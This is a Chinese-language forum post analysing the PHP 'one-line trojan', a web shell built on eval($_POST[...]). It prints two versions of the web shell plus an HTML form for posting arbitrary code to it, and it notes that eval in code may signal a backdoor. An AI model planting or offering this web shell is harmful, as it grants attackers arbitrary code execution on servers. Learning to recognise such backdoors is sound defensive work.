春哥技术源码论坛

 找回密码
 立即注册
 

响应式网站源码任意下载

2020最新暴利项目海量素材源码任意下载
阿里云优惠码

低价定制APP

低价H5响应式网站建设
阿里云备案码广告位招租50元/每月轻松暴利赚钱
查看: 1412|回复: 0

php eval函数一句话木马代码分析

[复制链接]
  • TA的每日心情
    开心
    2022-8-29 09:40
  • 签到天数: 1 天

    [LV.1]初来乍到

    27

    主题

    102

    回帖

    873

    积分

    高级会员

    Rank: 4

    积分
    873
    发表于 2016-4-5 21:53:47 | 显示全部楼层 |阅读模式
    <?php eval($_POST[tag])?>这个是php常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算。该字符串必须是合法的PHP代码,且必须以分号结尾。如果没有在代码字符串中调用return语句,则返回NULL。如果代码中存在解析错误,则eval()函数返回false。                eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马
    就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范

    ?
    1
    <?php @eval($_POST['c']);?>




    使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行
    ?
    1
    2
    3
    4
    5
    6
    7
    8
    <html>
    <body>
    <form action="a.php" method="post">
    <input type="text" name="c" value="phpinfo();">
    <input type="submit" value="submit">
    </form>
    </body>
    </html>



    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    QQ|Archiver|手机版|小黑屋|春哥技术源码论坛 |Sitemap

    GMT+8, 2024-4-29 16:27 , Processed in 0.064473 second(s), 30 queries .

    Powered by Discuz! X3.4

    Copyright © 2001-2021, Tencent Cloud.

    快速回复 返回顶部 返回列表